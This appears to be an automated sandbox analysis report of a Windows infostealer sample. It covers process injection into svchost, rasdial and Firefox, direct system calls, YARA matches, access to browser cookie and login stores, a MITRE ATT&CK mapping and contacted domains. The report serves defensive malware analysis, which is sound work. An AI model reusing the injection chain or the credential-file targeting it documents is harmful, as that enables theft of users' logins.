            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E1A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E1A364 SetUnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtProtectVirtualMemory: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\rasdial.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rasdial.exe | Thread register set: target process: 7400
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CE4008
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E48C93 LogonUserW
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00DF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00DF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E54EF5 mouse_event
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
Source: C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe | Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
Source: C:\Windows\SysWOW64\rasdial.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E481F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E54C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 20-EM-00- PI-INQ-3001.exe, eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: eVmdoPPWSZoVOB.exe, 00000005.00000000.1923199176.00000000014E1000.00000002.00000001.00040000.00000000.sdmp, eVmdoPPWSZoVOB.exe, 00000005.00000002.3531391111.00000000014E0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E1886B cpuid
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E250D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E32230 GetUserNameW
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E2418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00DF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\rasdial.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\rasdial.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_81
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_XP
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_XPe
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_VISTA
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_7
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: WIN_8
Source: 20-EM-00- PI-INQ-3001.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E66596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe | Code function: 0_2_00E66A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (flattened in the extracted report; rebuilt here per tactic, reading the original matrix row by row). A number in brackets is the count badge the report showed on that cell, copied as shown; techniques without a number carried no badge.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts [2]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API [2]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Valid Accounts [2]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation [1]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Valid Accounts [2]; Access Token Manipulation [21]; Process Injection [312]; Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools [1]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]; Valid Accounts [2]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [21]; Process Injection [312]
Credential Access: OS Credential Dumping [1]; Input Capture [21]; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [2]; System Information Discovery [116]; Security Software Discovery [151]; Virtualization/Sandbox Evasion [2]; Process Discovery [3]; Application Window Discovery [11]; System Owner/User Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [21]; Clipboard Data [3]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer [5]; Encrypted Channel [1]; Non-Application Layer Protocol [5]; Application Layer Protocol [5]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph
ID: 1503379 | Sample: 20-EM-00- PI-INQ-3001.exe | Start date: 03/09/2024 | Architecture: WINDOWS | Score: 100

Sample-level nodes:
DNS/IP: www.jaxo.xyz; www.weep.site; 12 other IPs or domains
Signatures: Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
